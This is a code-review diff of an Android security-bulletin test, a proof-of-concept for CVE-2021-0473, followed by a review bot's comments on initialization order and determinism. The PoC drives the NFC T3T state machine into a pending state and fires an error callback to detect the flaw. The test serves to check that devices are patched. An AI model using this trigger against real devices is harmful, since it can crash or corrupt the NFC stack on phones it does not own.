Diffstat (limited to 'hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp')
-rw-r--r--hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp40
1 files changed, 22 insertions, 18 deletions
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp
index d7650ad4d5f..152f5384323 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp
@@ -92,27 +92,31 @@ void GKI_freebuf(void *ptr) {
}
int main() {
- tRW_T3T_CB *p_t3t = &rw_cb.tcb.t3t;
+ tNFC_ACTIVATE_DEVT p_activate_params = {};
+ p_activate_params.protocol = NFC_PROTOCOL_ISO_DEP;
+ p_activate_params.rf_tech_param.mode = NFC_DISCOVERY_TYPE_POLL_A;
+ RW_SetActivatedTagType(&p_activate_params, &poc_cback);
+ FAIL_CHECK(rw_cb.p_cback == &poc_cback);
- GKI_init();
- rw_init();
- rw_cb.p_cback = &poc_cback;
+ tRW_T3T_CB *p_t3t = &rw_cb.tcb.t3t;
- uint8_t peerNfcID[NCI_RF_F_UID_LEN];
- uint8_t mrtiCheck = 1, mrtiUpdate = 1;
- if (rw_t3t_select(peerNfcID, mrtiCheck, mrtiUpdate) != NFC_STATUS_OK) {
- return EXIT_FAILURE;
- }
+ GKI_init();
+ rw_init();
+ rw_cb.p_cback = &poc_cback;
+
+ uint8_t peerNfcID[NCI_RF_F_UID_LEN];
+ uint8_t mrtiCheck = 1, mrtiUpdate = 1;
+ FAIL_CHECK(rw_t3t_select(peerNfcID, mrtiCheck, mrtiUpdate) == NFC_STATUS_OK);
- tNFC_CONN p_data = {};
- NFC_HDR nfcHdr = {};
- p_data.data.p_data = &nfcHdr;
+ tNFC_CONN p_data = {};
+ NFC_HDR nfcHdr = {};
+ p_data.data.p_data = &nfcHdr;
- tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
- p_t3t->rw_state = RW_T3T_STATE_COMMAND_PENDING;
+ tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ p_t3t->rw_state = RW_T3T_STATE_COMMAND_PENDING;
- uint8_t conn_id = NFC_RF_CONN_ID;
- tNFC_CONN_EVT event = NFC_ERROR_CEVT;
- p_cb->p_cback(conn_id, event, &p_data);
- return (kIsVulnerable) ? EXIT_VULNERABLE : EXIT_SUCCESS;
+ uint8_t conn_id = NFC_RF_CONN_ID;
+ tNFC_CONN_EVT event = NFC_ERROR_CEVT;
+ p_cb->p_cback(conn_id, event, &p_data);
+ return (kIsVulnerable) ? EXIT_VULNERABLE : EXIT_SUCCESS;
}
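Review bot: The new `RW_SetActivatedTagType(&p_activate_params, &poc_cback);` call and its `FAIL_CHECK` run before `GKI_init()` and `rw_init()`. The retained `rw_cb.p_cback = &poc_cback;` after `rw_init()` suggests that `rw_init()` resets `rw_cb`, although its body is not visible here. If it does, the activation state is discarded before the error event is delivered, and the check only proves the callback was stored momentarily. Either move the two lines below `rw_init()` or add a comment such as `// Activation must precede rw_init() because ...` explaining why the order is intentional. Separately, `peerNfcID` is still passed to `rw_t3t_select` uninitialized, so `uint8_t peerNfcID[NCI_RF_F_UID_LEN] = {};` would keep the run deterministic. A `FAIL_CHECK(p_cb->p_cback != nullptr);` before the final callback invocation would stop a setup failure from surfacing as a crash that could be mistaken for the vulnerability signal.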